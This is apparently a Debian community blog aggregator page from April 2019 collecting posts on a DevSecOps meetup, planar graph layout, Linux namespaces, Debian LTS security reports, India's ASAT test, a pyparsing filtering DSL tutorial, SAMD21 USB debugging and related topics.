April 05, 2019

hackergotchi for Shirish Agarwal

Shirish Agarwal

DevSecOps Pune Meetup 4

This I had attended almost a month back. I just didn’t have the time or the energy to blog about it. Thankfully, one of the organizers Rohan Nageskar took the time to blog about it so I don’t have to do much other than share a few of the links I had shared and some which I had forgotten to do on that date. The first one was about usage of A.I. for vulnerability assessment using twitter mentions as a source. While the idea certainly has merit and would go a long way in getting nods to fix vulnerabilities in the code during the whole cycle of development, production, deployment, scaling, maintainance till the time the code or app. or whatever needs to be retired. At the same time however, it is not known how accurate the system would be because at the end, it still relies on human input and humans per-se are bad at threat perception and evaluation as per millions of examples. All the wars that have been fought and are still being fought in whatever name is a strong example of that.

One of the other things that I shared was the Intel Spoiler attack which was just shared just a few hours ago or something so it was pretty fresh at the time. I also shared a bit about where the hardware industry seemed to be heading and it seems at least for the near future that AMD would have the leg up. There’s the whole RISC bit for which chips are already out there and lot more being promised in the coming months and year but that’s a different topic altogether.

Incidentally, while Rohan was sharing about using Ansible for scaling a webapp and how you would have different servers for scaling the webapp. depending on needs, I was wondering that definitely the BJP IT Team would have profited from Rohan’s presentation. While Rohan didn’t go much into specifics of things, it was more or a high-level overview of the process, it did establish some groundwork for any individual or team as to how they could go about it. For newbies they could well read up on the differences on webapp. and website . To my mind, they are one and the same as most sites nowadays are dyanmic in nature due to nature of things.

I also shared about the BJP site hack (unofficially of course) and everybody was nonplussed to learn about it because we all have been told again and again the skills the BJP IT cell has. This is when it was almost 2 weeks when the site was down. Few days later, they did put a sort of site back and stole a bootstrapable theme . There were quite a few hate comments, which can be easily be termed victim-shaming and they had no choice but to respond back . It seems that the people in BJP do not understand either understand or don’t want to understand Intellectual Property Rights or to be more specific, Copyright in this particular case. This specific example is clearly a case of copyright infringment rather than anything else. In fact all of the FOSS environment revolves around credit-sharing apart from monetary compensation.

Anyways, some pictures from the meetup to round off the day 🙂

Me sharing some point probably
All the attendees of the Devops meetup.

In the last picture you can see Rohan at the end right in an orange t-shirt with glasses while Rahul you can see in dead center in white shirt at the center. They were the organizers of the event. Many thanx to Qualys for being the host for the meetup.

05 April, 2019 07:55AM by shirishag75

April 04, 2019

Ian Jackson

Planar graph layout, straight line drawing

My project to make an alternative board for Pandemic Rising Tide needed a program to lay out a planar graph, choosing exact coordinates for the vertices.

(The vertices in question are the vertices of the graph which is the dual of the adjacency graph of the board "squares" - what Pandemic Rising Tide calls Regions. For gameplay reasons the layout wants to be a straight line drawing - that is, one where every boundary is a straight line.)

Existing software

I found that this problem was not well handled by existing Free Software. The leading contender, graphviz, generally produces non-planar layouts even for planar inputs; and it does not provide a way to specify the planar embedding. There are some implementations of "straight line drawing" algorithms from the literature, but these produce layouts which meet the letter of the requirement for the drawing to consist only of nonintersecting straight lines, but they are very ugly and totally unsuitable for use as a game board layout.

My web searches for solutions to this problem yielded only forum postings etc. where people were asking roughly this question and not getting a satisfactory answer.

I have some experience with computer optimisation algorithms and I thought this should be a tractable problem, so I set out to solve it - well, at least well enough for my purposes.

My approach

My plan was to use one of the algorithms from the literature to generate a straight line drawing, and then use cost-driven nonlinear optimisation to shuffle the vertices about into something pretty and useable.

Helpfully Boost provides an implementation of Chrobak & Payne's straight line drawing algorithm. Unfortunately Boost's other planar graph functions were not suitable because they do not remember which face is the outer face. (In planar graph theory and algorithms the region outside the graph drawing is treated as a face, called the outer face.) So I also had to write my own implementations of various preparatory algorithms - yet more yak shaving before I could get to the really hard part.

Having been on a Rust jag recently, I decided on Rust as my implementation language. I don't regret this choice, although it did add a couple of yaks.

Cost function and constraints

My cost function has a number of components:
  • I wanted to minimise the edge lengths.
  • But there was a minimum edge length (for both gameplay and aesthetic reasons)
  • Also I wanted to avoid the faces having sharp corners (ie, small angles between edges at the same vertex)
  • And of course I needed the edges to still come out of each vertex in the right order.
You will notice that two of these are not costs, but constraints. Different optimisation algorithms handle this differently.

Also "the edges to still come out of each vertex in the right order" is hard to express as a continuous quantity. (Almost all of these algorithms demand that constraints take the form of a function which is to be nonnegative, or some such.) My solution is, at each vertex, to add up the angles between successive edges (in the intended order, and always treating each direction difference as a positive angle). Ie, to add up the face corner angles. They should sum to tau: if so, we have gone round once and the order is right. If the edges are out of order, we'll end up going round more than once. If the sum was only tau too much, I defined the violation quantity to be tau minus the largest corner angle; this is right because probably it's just that two edges next to each other are out of order and the face angle has become "negative"; this also means that for a non-violating vertex, the violation quantity is negative but still represents how close to violation we are. (For larger corner angle sums, I added half of the additional angle sum as an additional violation quantity. That seemed good enough in the end.)

Simulated annealing - and visual debug of the optimisation

My first attempt used GSL's simulated annealing functions. I have had reasonable success with siman in the past. The constraints are folded into the cost function. (An alternative approach is to somehow deal with them in the random step function, eg by adjusting violating layouts to similar non-violating ones, but that seemed quite tricky here.)

Siman did not seem to be working at all.

I was hampered by not knowing what was going on so I wrote a visual debug utility which would let me observe the candidate layouts being tried, in real time. (I should have taken my first instinct and done it in Tcl/Tk, but initially Qt seemed like it would be easier. But in the end I had to fight several of Qt's built-in behaviours.)

The visual debug showed me the graph randomly jiggling about without any sign of progress. It was clear that if this was going to work at all it would be far too slow.

More suitable optimisation algorithm

I felt that a gradient descent algorithm, or something like one, would work well for this problem. It didn't seem to me that there would be troublesome local minima. More web searching led me to Steven G. Johnson's very useful NLopt library. As well as having implementations of algorithms I thought would work well, it offered the ability to change algorithm without having to deal with a whole new API.

I quickly found that NLopt's Sbplx algorithm (T. Rowan's Subplex algorithm, reimplemented) did fairly well. That algorithm does not support constraints but the grandly-named Augmented Lagrangian Method can handle that: it adds the constraint violations to the cost. It then reruns the optimisation, cranking up the constraint violation cost factor until none of the constraints are violated by more than the tolerance.

Unfortunately the Augmented Lagrangian Method can convert a problem with a cost function without local minima, into one which does have bad local minima. The Sbplx algorithm is a kind of descent algorithm so it finds a local minimum and hopes it's what you wanted. But unfortunately for me it wasn't: during the initial optimisation, part of the graph "capsized", violating the edge order constraint and leaving a planar layout impossible. The subsequent cranking up of the constraint violation cost didn't help, I think maybe because my violation cost was not very helpful at guiding the algorithm when things were seriously wrong.

But I fixed this by the simple expedient of adding the edge order constraint with a high cost to my own cost function. The result worked pretty well for my simple tests and for my actual use case. The graph layout optimiation takes a couple of minutes. The results are nice, I think.

I made a screen capture video of the optimisation running. (First the debug build which is slower so captures the early shape better; then again with the release build.)

Software

The planar graph layout tool I wrote is plag-mangler.

It's really not very productised, but I think it will be useful to people who have similar problems. Many of the worst features (eg the bad command line syntax) would be easy to fix. OTOH if you have a graph it does badly on, please do file an issue on salsa, as it will guide me to help make the program more general.

References

See my first post about this project for some proper references to the academic literature etc.

(Edit 2019-04-04 12:55 +0100: Fixed typos and grammar.)


comment count unavailable comments

04 April, 2019 11:56AM

April 03, 2019

Iustin Pop

A small presentation on Linux namespaces

Over the weekend I spent time putting together a few slides on Linux namespaces, mostly because I wanted to understand better (and putting this together helped a lot!), but also because it will be useful to me later, and finally (and really) because I promised to a few colleagues I’ll explain how all this works :)

So the HTML slides are here, and the source is on github. I put the source up because I’m very sure this has lots of mistakes; not only in the intro where I mention FreeBSD jails and OpenVZ a bit (but I have zero experience with both), but also in the main content, so any corrections are more than welcome.

Writing this, and organising it, was actually much more entertaining than I originally thought. It also made me realise that the kernel-level implementation is very powerful, and—at least to the extent that e.g. Debian uses it by default—it’s basically wasted (a lot of lost opportunity). I know there are some tools to use this, but for example why Firefox is not by default namespaced… I don’t know. Food for later thought. Happy to receive information otherwise, of course.

Most of the information is gathered from man pages, Wikipedia (for the historic bits), blog posts, mailing list archives, etc., so I don’t claim a lot of deep original content; the main idea is just to put all this information together in a single place.

Hope this is useful to somebody else, and again, contributions and re-sharing welcome (CC-BY-SA-4.0).

03 April, 2019 07:41PM

Sylvain Beucler

Debian LTS - March 2019

In February I had requested to join the Debian LTS project, which extends the security support for past Debian releases, as a paid contributor.
Kuddos to Freexian for pulling this project out.

I was asked to demonstrate a full security update on my own (non paid) which I did with 2 DLAs (Debian LTS Advisory):

  • freedink-dfarc: jessie-security update, applying my own path traversal security fix
  • phmyadmin: jessie-security update, assessing 1 CVE as not affected and fixing another

Incidentally, every Debian Developer can make a direct security upload to jessie-security without prior validation (just follow the guide).

-

Following the spirit of transparency that animates Debian and Debian Security, here's my report for my first paid month.

In March, the monthly sponsored hours were split evenly among contributors depending on their max availability.
I got 29.5h, which I spent on:

  • nettle/gnutls: investigate local side-channel attack and conclude no-dsa / minor issue
  • symfony: helped test Roberto's update
  • sqlalchemy: jessie-security update for SQL injection, tested and discussed upstream's own backported patch
  • glib2.0: investigate denial of service and mark as no-dsa / no reproducible
  • ghostscript: investigate sandbox break and (lack of) test suite, and conclude we'll backport the next upstream release
  • pdns: jessie-security update for the 'remote' backend
  • Fixes/updates in dla-needed.txt, our (public) list of triaged security issues
  • Fixes in LTS wiki, templates and scripts, in particular wrt https://www.debian.org/lts/security/ integration

If you'd like to know more about LTS security, I recommend you check:

03 April, 2019 02:02PM

hackergotchi for Mike Gabriel

Mike Gabriel

My Work on Debian LTS/ELTS (March 2019)

In March 2019, I have worked on the Debian LTS project for 14 hours (of 10 hours planned plus 4 hours pulled over from February) and on the Debian ELTS project for another 2 hours (of originally planned 6 hours) as a paid contributor.

LTS Work

  • CVE triaging (ntp, glib2.0, libjpeg-turbo, cron, otrs2, poppler)
  • Sponsor upload to jessie-security (aka LTS): cron (DLA 1723-1 [1])
  • Upload to jessie-security (aka LTS): openssh (DLA 1728-1 [2])
  • Upload to jessie-security (aka LTS): libssh2 (DLA 1730-1 [3])
  • Upload to jessie-security (aka LTS): libav (DLA 1740-1 [4])

ELTS Work

  • Create .debdiff for cron src:pkg targetting wheezy (but I failed to build it due to two issues with Debian 10 as build machine)
  • Discover and document that kernel boot parameter "vsyscall=emulate" is required for building wheezy packages on Debian 10. (See #844350 and #845942 for details).
  • Bug hunt sbuild bug #926161 in sbuild 0.78.1-1 [5]

References

03 April, 2019 01:23PM by sunweaver

April 02, 2019

hackergotchi for Shirish Agarwal

Shirish Agarwal

ASAT and ISRO, DRDO merger rumor

ASAT Test

For last few days I was not in Pune as had gone to attend a workshop which was funded by Innovation for change . Unfortunately, I was not able to take part in the workshop as the traveling proved to be a bit too much in too short a time. While I would share more in another blog post for the moment, I would like to share about the ASAT test that India conducted. While it’s a positive development, from my perspective there was no need for the Prime Minister to come on-stage and declare that we can shoot down a Satellite at 3k when China can do the same at 38k . So we have a long way to go, in as far as parity with China is concerned. While I’m not sharing the source of this information, this is for all and anybody to see and figure out if you know how to use the web. There are a few things I would share, I didn’t use any private data-sets to get this information, which means it’s available easily online. I did not use tor, the dark web otherwise I probably could have got far more material. Thirdly and more interestingly, if you wanna start your search from scratch, ORF could be a good starting point from an Indian POV although there are many other such think-tanks which could help you in your research.

The only question I have to ask is if we are the weaker party, which is clearly the case herein, then whom are we trying to sell this idea if not the Indian public ? Chinese military satellites are in varying range from 300 km. to 36,000 km. so there is hardly a chance that we would be able to make any significant dent to their military usage. Also using an ASAT on another country’s satellite would be an act of war. As far as Communication satellites are concerned, they are also at 36,000 km. are at the Geostationary orbit so they will not be harmed. There is also a pretty nice animation of the same at wikimedia .

International Politics

While we can understand that Mr. Modi did it for electioneering, it does have impact internationally. Last year when the Chinese did another ASAT test (which the Pentagon guestimate it reached 36k from sea level from their ground and space-based instruments) . The Chinese statement was quite brief and to the point . They said that they did the test and it performed on all the military objectives. This is a sort of perfect statement which doesn’t reveal either what the Chinese military objectives of the test were and what was accomplished. All other Governments either have to rely on their own instrumentation (if they have in space to spy and on lookout for such activities ) or rely on Pentagon’s guestimates and findings which they chose to public. The Americans are also well to not show their hand and may share some information or even share mis-information as this is and would be considered part of Information warfare. This is also precisely the reasons we have ambassadors, diplomats and others who sit together and are engaged in naunced wording. There were no need of an announcement and even if it needed, it could have been done by some mid-level executive on DRDO saying something similar on the lines of what the Chinese said and probably adding we have a long road ahead of us or something like that.

Update – 04/04/2019 – Somebody on twitter shared a link to Dr. Saraswat’s latest interview which was held a few days back .

The answers were designed in the way so as to show that the UPA govt. didn’t show the interest for the ASAT test while the NDA Govt. Even if we do take Dr. Saraswat’s interpretion of how the event happened, it still raises questions rather than answers.

  1. By. Dr. Saraswat’s own admission, it was an informal presentation . While he didn’t go into the details of what he meant by ‘informal presentation’ it could be something akin to somebody asking me to do an informal presentation on Debian. For this, the most I have to do is collect my thoughts, read up a bit onto what’s new, exciting if there is something which catches my eye and at the most have 5-7 pages of slides and depending upon what kind of organization it is, I would share what Debian is. If however, somebody would ask me to make a presentation on a possible Debian deployment, it would consist of knowing and having details of how small or big the network is ? What are the critical points in the network (for e.g. many shops or small businessess have either their custom-designed billing system whose source-code they don’t have and has to be on MS-Windows) while other systems you could potentially do the deployment. Apart from doing the actual deployment, there would be time for training, documentation etc. all of which involve some sort of hard numbers and time which both parties would have to work at to get some sort of understanding of how this different system works.

2. And this is where my question comes in. In the interview it’s also not mentioned what time or date when the presentation was done. Now we all know that 2014 was only a year away, if the presentation was done 6-9 months before elections, it is very much possible that there was no interest because it would be time-consuming and there are no guarantees of a successful test. In fact, before this test which was declared a success, there was another test which was conducted by DRDO which was a failure. This also begs or marks the question as to when did Dr. Saraswat approach NDA or vice-versa and when he started actively working on the project. Did it take 5 years for this to come to this stage or 2 years or less because that would give some more guidance and a way for us to guage future success of the project.

Rumour of Merging DRDO and ISRO

There is also a worrying bit of news that the Government of India is thinking of merging both DRDO and ISRO to be similar structure to what the Chinese have for their space program, which I think will be disastrous for the Indian Space Program, the taxpayer public money as well as the two organizations as well.

DRDO work culture

While my mother had the honor of serving within a sub-set of DRDO and she was friends with few scientists, one of the major grouses for most scientists was the constant shifting of parameters or specifications. To take a very simple example, let’s think that you are told or given a set of specs. of a Maruti 800, a small city car , then a year, year down the half, you are told that the design specifications has changed to now a Station Wagon or a hatchback and when you start to design for those, the specs. are changed again in a year or two to a sports car. Now any car-enthusiast would know that these three are completely different cars having their unique needs, dimensions, center of gravity, steering, fuel consumption, the works. Extrapolate that to a missile or missiles where more often than not, these design changes were at many a times not asked by the Armed forces who would be the actual users but the bureaucracy i.e. civil servants, many from IAS who instead of consulting, using consesus of the people on both sides, instead share and put whatever opinion they have. Of course inter-personality conflicts also do occur and inspite of it DRDO is able to do what it does. Because of quite a few such Inter-personality conflicts, many a brilliant scientist have been forced to leave DRDO and are now either serving private Indian interests or some foreign ones and they repent why they spent their best productive years at DRDO or whatever sub-unit they were into.

ISRO Work culture

While I do not have relatives working in ISRO, I do and did have friends who work or have worked in ISRO. Due to the nature of the work itself, which is more exploratory and peaceful in nature, they are able to collaborate with lot of educational institutions within India and worldwide and even collaborate with organizations like NASA, ESA and others. The civilian beaureacracy has had a more hands-off approach which has resulted in ISRO being able to carry out whatever fantastic achievements they have been able to achieve. The only thing, if they need to learn from this Government, is the ability to find money and do more of promotion of the good work they are doing. Even if ISRO were to do 1% of the promotion that NASA does in promotion with merchandising, they would get more than money back while at the same time inspire millions of young children to take up challenges in space sciences.

So from the above, it is pretty clear it would be disastrous as both have a very different mind-set and ways of working. I remember hearing or conversing with some military gentleman couple of years ago and we were talking on some similar topics. This was on a short train trip. The gentleman remarked, it’s not often that we get things to work right the first time, in any of the fields of endevour the military does. If we do, even some small part, we make sure not to disturb or change it and would make changes around it so it works and fix all the other things and processes till there is cohesion. He went on to share some real-life examples from his work which I have since forgotten but the principle seems good, solid enough at least to me.

Making Organizations Fun

At the very end, I would like to draw attention to Jonathan Carter’s blog post where he shares about Debian and Fun . I found both the art peices most appropriate not just for the organizations listed above, but should be the calling points of any organization which believes in genuine stewardship of whatever organization they have or hope to take forward.

While I would invite everybody who has more than a passing interest in the world of computer science to see Jonathan’s and other potential DPL (Debian Project Leader) platforms as well as their rebuttals, the difference between the two is statements or pictures above is that while the first one is an employer-employee model, the second is more on the volunteer, contributor-steward model. Although as DPL , the only perks the DPL enjoys are speaking about Debian in sometimes exotic locations, although that is more than tempered by being part of Debian Politics and Free software politics which comes with its own rewards, risk scenario and is and can be pretty tricky as has been observed over the years.

02 April, 2019 10:48PM by shirishag75

Reproducible builds folks

Reproducible Builds: Weekly report #205

Here’s what happened in the Reproducible Builds project between March 24th and March 30th 2019:

Don’t forget that Reproducible Builds is part of May/August 2019 round of Outreachy which offers paid internships to work on free software. Internships are open to applicants around the world and are paid a stipend for the three month internship with an additional travel stipend to attend conferences. So far, we received more than ten initial requests from candidates and the closing date for applicants is April 2nd. More information is available on the application page.

Packages reviewed and fixed, and bugs filed

Test framework development

  • We operate a comprehensive Jenkins-based testing framework that powers tests.reproducible-builds.org. The following changes were done this week:

    • Mattia Rizzolo built a static list of SSH host keys [] so we could build the ssh_config file based on this file [], leading to being able to enable OpenSSH’s StrictHostKeyChecking option [][][].
    • Holger Levsen added a number of links to pages, including Guix’s challenge command [], the F-Droid tests [] as well as NixOS and openSUSE tests [].

This week’s edition was written by Bernhard M. Wiedemann, Chris Lamb & Holger Levsen and was reviewed by a bunch of Reproducible Builds folks on IRC & the mailing lists.

02 April, 2019 01:11PM

hackergotchi for Ben Hutchings

Ben Hutchings

Debian LTS work, March 2019

I was assigned 20 hours of work by Freexian's Debian LTS initiative and carried over 16.5 hours from February. I worked 22.5 hours and so will carry over 14 hours.

I merged changes from stretch's linux package into the linux-4.9 package, uploaded that, and issued DLA-1715. I made another stable update to Linux 3.16 (3.16.64). I then rebased Debian's linux package on that version, uploaded it, and issued DLA-1731. This unfortunately introduced a regression, which I fixed in a second update.

I also reviewed and merged Emilio Pozuelo Monfort's changes to the firmware-nonfree package to address CVE-2018-5383.

02 April, 2019 10:12AM

Abhijith PA

DebUtsav Delhi

Hello.

Three weeks ago I attended DebUtsav-Delhi organized by the Debian and free folks in North India.

Group photo

Debutsav-Delhi is the third edition of its kind. Initially Mozilla Delhi backed the Debutsav-delhi when they pitched the idea but later they withdrew for some reason and just became a supporting member. I must say Debian India events are happening frequent now. Some years ago in India Debian hang around with other FLOSS events. Now its DebUtsav giving chance to other FLOSS people to meet around Debian.

As the usual way of DebUtsav, this one also was two day event with separate track for Debian related talks and for general FLOSS talk. I gave a talk about Debian LTS project. On first day evening some speakers and organizers gathered for dinner.

Dinner

Its funny that most of the Debian people gathered there were contributing/contributed to Ruby and JavaScript team . There is a strong reason for that. All the contributors to Debian from India after 2014 were branched out from a single person who do mostly Ruby and JS - Pirate Praveen. You can expect a blog post from him about Debutsav. He is contesting in upcoming Lok Sabha Elections and quite busy with that.

On second day there were talks from SFLC - Digital Security and Privacy. Srud conducted a interactive session with topic Gender diversity in FLOSS projects. We reserved afternoon sessions for Bug Squashing Party and introducing packaging tutorial to newcomers. All together it was a wonderful gathering. I also met isaagar whom with I have corresponded in matrix a lot but finally able to meet him IRL.

Special appreciation to Hamara Linux for sponsoring the event.They are becoming the de facto sponsors of every Debian events in India.

02 April, 2019 08:24AM

hackergotchi for Dirk Eddelbuettel

Dirk Eddelbuettel

tint 0.1.1: New Styles

With almost year passed since the previous 0.1.0 release, a nice new release of the tint package arrived on CRAN today. Its name expands from tint is not tufte as the package offers a fresher take on the Tufte-style for html and pdf presentations.

This version adds new features, and a new co-author. Jonathan Gilligan calmly and persistently convinced me that there was ‘life beyond Roboto’ and I overcame the reluctance to offer other fonts. So now we have two additional reference implementations for Lato and Garamond which look stunning, as well as generally enhanced support for fonts, font families and entire LaTeX templates all via the standard YAML headers.

A screenshot for Lato follows:

And another for garamond:

The full list of changes is below.

Changes in tint version 0.1.1 (2019-03-30)

  • The two pdf styles have been extended allowing more flexible LaTeX customization particularly for fonts but also link colour. (Jonathan in #30)

  • Two example documents where added pre-rendered (and not as vignettes to keep processing lighter)

  • Documentation for the HTML style was updates (Jonathan in #30).

Courtesy of CRANberries, there is a comparison to the previous release. More information is on the tint page.

For questions or comments use the issue tracker off the GitHub repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

02 April, 2019 01:03AM

April 01, 2019

hackergotchi for Gunnar Wolf

Gunnar Wolf

Debian @ Internet Freedom Fesitval #internetFF

Today, we had a little get-together of DDs in València, Spain, with some other DDs.

Most of us were here to attend the Internet Freedom Festival (IFF), plus Héctor and Filippo, who are locals. We missed some DDs (because in a 2500+ people gathering... Well, you cannot ever find everybody you are looking for!) so, sorry guys for not having you attend!

Sadly, we have no further report than having enjoyed a very nice dinner. No bugs were closed, no policy was discussed, no GRs were drafted, no cabals were hatched.

AttachmentSize
deb_iff.jpg2.97 MB
deb_iff_mini.jpg180.18 KB

01 April, 2019 11:07PM by gwolf

Hideki Yamane

Specifying debian mirror for your docker image

For people who use Debian as docker base image...

  • Do not use ftp.debian.org as your apt line in docker image, use deb.debian.org instead. It chooses near mirror where users are
  • If you use old Jessie, use cdn-fastly.deb.debian.org instead of deb.debian.org. Since old apt in Jessie cannot handle redirect
  • Do not use httpredir.debian.org, it is obsolete


01 April, 2019 09:08AM by Hideki Yamane (noreply@blogger.com)

hackergotchi for Julien Danjou

Julien Danjou

Writing Your Own Filtering DSL in Python

Writing Your Own Filtering DSL in Python

A few months ago, we've seen how to write a filtering syntax tree in Python. The idea behind this was to create a data structure — in the form of a dictionary — that would allow to filter data based on conditions.

Our API looked like this:

>>> f = Filter(
  {"and": [
    {"eq": ("foo", 3)},
    {"gt": ("bar", 4)},
   ]
  },
)
>>> f(foo=3, bar=5)
True
>>> f(foo=4, bar=5)
False

While such a mechanism is pretty powerful to use, the input data structure format might not be user friendly. It's great to use, for example, with a JSON based REST API, but it's pretty terrible to use for a command-line interface.

A good solution to that problem is to build our own language. That's called a DSL.

Building a DSL

What's a Domain-Specific Language (DSL)? It's a computer language that is specialized to a certain domain. In our case, our domain is filtering, as we're providing a Filter class that allows to filter a set of value.

How do you build a data structure such as {"and": [{"eq": ("foo", 3)}, {"gt": ("bar", 4)}]} from a string? Well, you define a language, parse it, and then convert it to the right format.

In order to parse a language, there are a lot of different solutions, from implementing manual parsers to using regular expression. In this case, we'll use lexical analsysis.

First Iteration

Let's start small and define the base of our grammar. That should be something simple, so we'll go with <identifier><operator><value>. For example "foobar"="baz" is a valid sentence in our grammar and will conver to {"=": ("foobar", "baz")}.

The following code snippet leverages pyparsing for parsing the string and specifying the grammar:

import pyparsing

identifier = pyparsing.QuotedString('"')
operator = (
    pyparsing.Literal("=") |
    pyparsing.Literal("≠") |
    pyparsing.Literal("≥") |
    pyparsing.Literal("≤") |
    pyparsing.Literal("<") |
    pyparsing.Literal(">")
)
value = pyparsing.QuotedString('"')

match_format = identifier + operator + value

print(match_format.parseString('"foobar"="123"'))

# Prints:
# ['foobar', '=', '123']

With that simple grammar, we can parse and get a token list composed of our 3 items: the identifier, the operator and the value.

Transforming the Data

The list above in the format [identifier, operator, value] is not really what we need in the end. We need something like {operator: (identifier, value)}. We can leverage pyparsing API to help us with that.

def list_to_dict(pos, tokens):
    return {tokens[1]: (tokens[0], tokens[2])}


match_format = (identifier + operator + value).setParseAction(list_to_dict)

print(match_format.parseString('"foobar"="123"'))

# Prints:
# [{'=': ('foobar', '123')}]

The parseString method allows to modify the returned value of a grammar token. In that case, we transform the list of the dict we need.

Plugging the Parser and the Filter

In the following code, we'll reuse the Filter class we wrote in our previous post. We'll just add the following code to our previous example:

def parse_string(s):
    return match_format.parseString(s, parseAll=True)[0]


f = Filter(parse_string('"foobar"="baz"'))
print(f(foobar="baz"))
print(f(foobar="biz"))

# Prints:
# True
# False

Now, we have a pretty simple parser and a good way to build a Filter object from a string.

As our Filter object supports complex and nested operations, such as and and or, we could also add it to the grammar — I'll leave that to you reader as an exercise!

Building your own Grammar

pyparsing makes it easy to build one's own grammar. However, it should not be abused: building a DSL means that your users will have to discover and learn it. If it's way different that what they know and already exists, it might be cumbersome for them.

Finally, if you're curious and want to see a real world usage, Mergify condition system leverages pyparsing to implement its parser. Check it out!

01 April, 2019 07:25AM by Julien Danjou

Paul Wise

FLOSS Activities March 2019

Changes

Issues

Review

Administration

  • Debian wiki: update email addresses, whitelist email addresses, whitelist domains
  • Debian security tracker: merge patches

Communication

Sponsors

All work was done on a volunteer basis.

01 April, 2019 03:06AM

March 31, 2019

hackergotchi for Keith Packard

Keith Packard

samd21-usb

SAMD21 USB vs Windows 7

I'm mostly used to USB being really hard to get working on a new SoC, everything from generating a stable 48MHz clock to diving through thousands of register definitions to get the device programmed to receive that first SETUP packet. However, I'm used to having that part be the hardest section of the work, and once the first SETUP packet has been received and responded to successfully, it's usually down hill from there.

Not this time.

I've written about Snek on the SAMD21G18A before, and this is about the same board. USB on this device is medium-complicated, as the device supports both host and device modes, plus has a range of 'optimizations' which always makes simple operation harder. It took a few hours of hacking to get SETUP packets flowing, but after that (at least when talking to Linux and Mac OS X), the rest of the USB driver was pretty simple.

Enter Windows 7

I'm pushing towards a Snek 1.0 release and was testing snekde on Windows 7. It's working great with the classic Arduino Duemilanove, but when I plugged in the Metro M0 board, it got stuck after I typed one character. "That's Odd", I thought.

I figured it'd be a simple matter of a stuck interrupt or other minor mistake in the SAMD21 USB driver that I wrote. So, I broke out my trusty Beagle USB analyzer to see where the USB link was getting stuck.

IN-NAK ... IN DATAx ...

USB is an odd protocol; data from the device to the host has to sit in the device waiting for the host to come and ask for it. When the device is in use, the host polls for data by sending an IN packet. When there's no data to send back, the device sends a NAK reply. When there is data, the device sends a DATAx packet and the host replies with an ACK packet.

In my case, the host sends thousands of IN packets waiting for data, and the device responds with an equally huge number of NAK packets. The first time data was queued from the device to the host, the device responded to the IN packet with a DATAx packet and the host ACK'd that. After that, the host never sent another IN packet again. It would happily send it's own data using OUT packets, and the device would receive that data, and of course the usual stream of SOF (start of frame) packets were streaming along. But, not a single IN packet to be seen.

Differential Debugging

Well, I've got a lot of USB devices around here, so I hooked up one of our TeleBTv3.0 devices. That worked just fine, which was good as we've sold hundreds of those and it would kinda suck to discover that some Windows boxes weren't compatible.

A visual examination of the traces as seen captured by the Beagle analyzer didn't show anything obvious. But, it's often the little details that break things.

So, I hacked up the SAMD21 board to appear to be the same device as the TeleBT -- same VID/PID, same names, same serial number. Everything.

Now windows can't seem to tell the difference. It uses the same COM port for both at least.

I devised a simple test — plug-in the device, start PuTTY and then type two characters ('a', or 0x61). Because both devices echo whatever you send to them, this means I should get two characters back. Because they're typed separately, those two characters will be sent in separate OUT transactions, and the echos should be sent back in two IN transactions.

I captured traces from both devices:

TeleBT-v3.0 (STM32L151):

Metro M0 (SAMD21G18A):

The 'trimmed' versions elide timing and packet sequence information which can't be easily replicated exactly between the two tests; that "can't" matter, at least according to my understanding of USB. With those versions, I can do a text diff of the packet traces to find that, aside from a different number of SOF and IN-NAK transactions, the only difference appears at the end

$ diff -u stm32l.trim samd21.trim | tail +231
 0  1 B  01 04 OUT txn 61   
 1  3 B  01 04    OUT packet E1 01 BA   
 1  4 B  01 04    DATA0 packet C3 61 81 57   
 1  1 B  01 04    ACK packet D2   
-0  1 B  01 05 IN txn   [57536 POLL] 61   
-1    01 05    [57536 IN-NAK]    
+0  1 B  01 05 IN txn   [50387 POLL] 61   
+1    01 05    [50387 IN-NAK]    
 1  3 B  01 05    IN packet 69 81 0A   
 1  4 B  01 05    DATA0 packet C3 61 81 57   
 1  1 B  01 05    ACK packet D2   
-0      [1004 SOF]  [Frames: 853 - 1856]   
+0      [2000 SOF]  [Frames: 138 - 89] [Periodic Timeout]  
+0      [2000 SOF]  [Frames: 90 - 41] [Periodic Timeout]  
+0      [572 SOF]  [Frames: 42 - 613]   
 0  1 B  01 04 OUT txn 61   
 1  3 B  01 04    OUT packet E1 01 BA   
 1  4 B  01 04    DATA1 packet 4B 61 81 57   
 1  1 B  01 04    ACK packet D2   
-0  1 B  01 05 IN txn   [83901 POLL] 61   
-1    01 05    [83901 IN-NAK]    
-1  3 B  01 05    IN packet 69 81 0A   
-1  4 B  01 05    DATA1 packet 4B 61 81 57   
-1  1 B  01 05    ACK packet D2   
-0    01 01 [16 IN-NAK]  [Periodic Timeout]  
-0    01 05 [178185 IN-NAK]  [Periodic Timeout]  
-0      [2000 SOF]  [Frames: 1857 - 1808] [Periodic Timeout]  
-0    01 01 [16 IN-NAK]  [Periodic Timeout]  
-0    01 05 [147487 IN-NAK]  [Periodic Timeout]  
-0      [2000 SOF]  [Frames: 1809 - 1760] [Periodic Timeout]  
-0      [474 SOF]  [Frames: 1761 - 186]   
-0    01 05 [34876 IN-NAK]    
-0   ! 01 05 [1 ORPHANED]    
-1   U 01 05    [1 IN]    
-0    01 01 [16 IN-NAK]    
-0      Capture stopped  [Sun 31 Mar 2019 02:25:32 PM PDT]  
+0      [2000 SOF]  [Frames: 614 - 565] [Periodic Timeout]  
+0      [1163 SOF]  [Frames: 566 - 1728]   
+0      Capture stopped  [Sun 31 Mar 2019 02:36:23 PM PDT]

You can see both boards receiving the first 'a' character and then send that back. Then both boards receive the second 'a' character, but only the stm32l gets the IN packets which it can respond with the DATAx packet containing the 'a' character. The samd21 board gets only SOF packets.

Next Steps?

I'm heading out of town on Tuesday to help with the NASA Student Launch, so I think I'll let this sit until I get back. Maybe I'll come up with a new debugging idea, or maybe I'll hear about a fancier USB monitoring device that might capture details that I'm missing.

Anyone with suggestions or comments is welcome to send them along; I'd like to get this bug squashed and finish the rest of the Snek 1.0 release process.

31 March, 2019 10:21PM

Iustin Pop

Kobo Forma eReader review

An e-ink ebook reader in 2019? Why?

Well, “why not” is too brief, so let’s expand on it a bit.

Why an eReader?

I used eBook readers for a long time, as the eInk format was a reasonably good replacement for paper books. I don’t remember when I started exactly (sometimes after 2010), but after my Sony PRS-650 was stolen (argh, stupid me) and I moved to a Sony PRS-T3, my use of it decreased over time.

